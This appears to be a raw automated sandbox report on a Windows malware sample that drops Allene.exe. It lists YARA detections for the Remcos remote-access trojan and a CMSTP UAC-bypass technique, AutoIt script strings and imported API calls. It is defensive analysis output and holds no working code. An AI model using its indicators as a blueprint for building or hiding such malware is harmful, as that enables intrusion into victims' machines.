                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: This is a third-party compiled AutoIt script.0_2_00883B3A
                Source: 7056ZCiFdE.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5802f912-5
                Source: 7056ZCiFdE.exe, 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e5fa5dba-5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: This is a third-party compiled AutoIt script.1_2_005D3B3A
                Source: Allene.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3654c9d2-4
                Source: Allene.exe, 00000001.00000002.4155616853.0000000000684000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6f9caac4-8
                Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_64b6de13-5
                Source: Allene.exe, 00000004.00000002.1919469392.0000000000684000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_880d2325-c
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00883633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00883633
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0090C1AC
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0090C498
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0090C5FE
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C57D SendMessageW,NtdllDialogWndProc_W,0_2_0090C57D
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C88F NtdllDialogWndProc_W,0_2_0090C88F
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C8BE NtdllDialogWndProc_W,0_2_0090C8BE
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C860 NtdllDialogWndProc_W,0_2_0090C860
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C909 NtdllDialogWndProc_W,0_2_0090C909
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090C93E ClientToScreen,NtdllDialogWndProc_W,0_2_0090C93E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0090CABC
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090CA7C GetWindowLongW,NtdllDialogWndProc_W,0_2_0090CA7C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00881287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,0_2_00881287
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00881290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00881290
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090D3B8 NtdllDialogWndProc_W,0_2_0090D3B8
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_0090D43E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008816B5 NtdllDialogWndProc_W,0_2_008816B5
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008816DE GetParent,NtdllDialogWndProc_W,0_2_008816DE
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0088167D NtdllDialogWndProc_W,0_2_0088167D
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090D78C NtdllDialogWndProc_W,0_2_0090D78C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0088189B NtdllDialogWndProc_W,0_2_0088189B
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090BC5D NtdllDialogWndProc_W,CallWindowProcW,0_2_0090BC5D
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090BF8C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0090BF8C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090BF30 NtdllDialogWndProc_W,0_2_0090BF30
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,1_2_0041CA9E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,1_2_0041ACC1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,1_2_0041ACED
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_005D3633
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_0065C1AC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_0065C498
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C57D SendMessageW,NtdllDialogWndProc_W,1_2_0065C57D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_0065C5FE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C860 NtdllDialogWndProc_W,1_2_0065C860
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C8BE NtdllDialogWndProc_W,1_2_0065C8BE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C88F NtdllDialogWndProc_W,1_2_0065C88F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C93E ClientToScreen,NtdllDialogWndProc_W,1_2_0065C93E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065C909 NtdllDialogWndProc_W,1_2_0065C909
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065CA7C GetWindowLongW,NtdllDialogWndProc_W,1_2_0065CA7C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0065CABC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,1_2_005D1290
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,1_2_005D1287
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065D3B8 NtdllDialogWndProc_W,1_2_0065D3B8
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,1_2_0065D43E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D167D NtdllDialogWndProc_W,1_2_005D167D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D16DE GetParent,NtdllDialogWndProc_W,1_2_005D16DE
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D16B5 NtdllDialogWndProc_W,1_2_005D16B5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065D78C NtdllDialogWndProc_W,1_2_0065D78C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D189B NtdllDialogWndProc_W,1_2_005D189B
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065BC5D NtdllDialogWndProc_W,CallWindowProcW,1_2_0065BC5D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065BF30 NtdllDialogWndProc_W,1_2_0065BF30
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065BF8C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,1_2_0065BF8C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_008EA1EF
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AF5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_008D8310
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008E51BD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,1_2_004158B9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_006351BD
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0088E6A00_2_0088E6A0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AD9750_2_008AD975
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0088FCE00_2_0088FCE0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A21C50_2_008A21C5
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B62D20_2_008B62D2
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_009003DA0_2_009003DA
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B242E0_2_008B242E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A25FA0_2_008A25FA
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008966E10_2_008966E1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008DE6160_2_008DE616
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B878F0_2_008B878F
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E88890_2_008E8889
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008988080_2_00898808
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_009008570_2_00900857
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B68440_2_008B6844
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008ACB210_2_008ACB21
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B6DB60_2_008B6DB6
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00896F9E0_2_00896F9E
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008930300_2_00893030
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A31870_2_008A3187
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008AF1D90_2_008AF1D9
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008812870_2_00881287
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A14840_2_008A1484
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008955200_2_00895520
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A76960_2_008A7696
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008957600_2_00895760
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A19780_2_008A1978
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008B9AB50_2_008B9AB5
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008A1D900_2_008A1D90
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008ABDA60_2_008ABDA6
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00907DDB0_2_00907DDB
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_00893FE00_2_00893FE0
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0088DF000_2_0088DF00
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_015FBF300_2_015FBF30
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041D0711_2_0041D071
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004520D21_2_004520D2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043D0981_2_0043D098
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004371501_2_00437150
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004361AA1_2_004361AA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004262541_2_00426254
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043651C1_2_0043651C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0044C7391_2_0044C739
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004367C61_2_004367C6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004267CB1_2_004267CB
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043C9DD1_2_0043C9DD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00432A491_2_00432A49
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00436A8D1_2_00436A8D
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043CC0C1_2_0043CC0C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00436D481_2_00436D48
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00434D221_2_00434D22
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00426E731_2_00426E73
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00440E201_2_00440E20
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0043CE3B1_2_0043CE3B
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00412F451_2_00412F45
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00452F001_2_00452F00
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00426FAD1_2_00426FAD
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005DE6A01_2_005DE6A0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FD9751_2_005FD975
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005DFCE01_2_005DFCE0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F21C51_2_005F21C5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006062D21_2_006062D2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006503DA1_2_006503DA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0060242E1_2_0060242E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F25FA1_2_005F25FA
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0062E6161_2_0062E616
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E66E11_2_005E66E1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0060878F1_2_0060878F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006068441_2_00606844
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006508571_2_00650857
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E88081_2_005E8808
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006388891_2_00638889
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FCB211_2_005FCB21
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00606DB61_2_00606DB6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E6F9E1_2_005E6F9E
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E30301_2_005E3030
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FF1D91_2_005FF1D9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F31871_2_005F3187
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005D12871_2_005D1287
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F14841_2_005F1484
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E55201_2_005E5520
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F76961_2_005F7696
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E57601_2_005E5760
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F19781_2_005F1978
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00609AB51_2_00609AB5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00657DDB1_2_00657DDB
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005F1D901_2_005F1D90
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005FBDA61_2_005FBDA6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005DDF001_2_005DDF00
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_005E3FE01_2_005E3FE0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_010FBE901_2_010FBE90
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: String function: 00887DE1 appears 35 times
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: String function: 008A0AE3 appears 70 times
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: String function: 008A8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 004020E7 appears 40 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 005F0AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 005D7DE1 appears 36 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 005F8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 004338A5 appears 41 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: String function: 00433FB0 appears 55 times
                Source: 7056ZCiFdE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
